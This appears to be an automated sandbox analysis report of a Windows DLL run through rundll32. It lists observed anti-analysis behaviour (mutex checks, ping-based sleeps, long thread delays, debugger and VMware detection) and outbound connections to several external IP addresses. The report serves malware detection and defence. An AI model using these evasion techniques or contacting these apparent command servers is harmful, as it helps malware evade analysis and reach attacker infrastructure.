Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-17279
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001E1FE rdtsc 3_2_1001E1FE
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 537Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 4495Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6696Thread sleep count: 236 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6696Thread sleep time: -2360000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752Thread sleep count: 537 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752Thread sleep time: -966600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5372Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5624Thread sleep time: -4200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5652Thread sleep count: 53 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4288Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6604Thread sleep time: -2340000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6204Thread sleep time: -4800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4336Thread sleep time: -4200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6304Thread sleep time: -10800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752Thread sleep count: 4495 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752Thread sleep time: -8091000000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4288Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10007F3E FindFirstFileA,FindNextFileA,Sleep,FindClose,3_2_10007F3E
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
Source: Amcache.hve.13.drBinary or memory string: VMware
Source: rundll32.exe, 00000003.00000002.4627377424.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s\Applications\\VMwareHo
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000003.00000002.4627673780.000000000270A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4627673780.00000000026BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000003.00000003.4418891128.000000000276E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\*.*`Yq
Source: Amcache.hve.13.drBinary or memory string: vmci.sys
Source: Amcache.hve.13.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.drBinary or memory string: VMware20,1
Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 00000003.00000002.4628180848.00000000042EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Applications\\VMwareHostOpen.exe
Source: rundll32.exe, 00000003.00000003.2475810862.00000000004C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Ly\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001E1FE rdtsc 3_2_1001E1FE

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.110 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.160.131.253 18659Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.160.131.254 23588Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 116.133.8.92 80Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
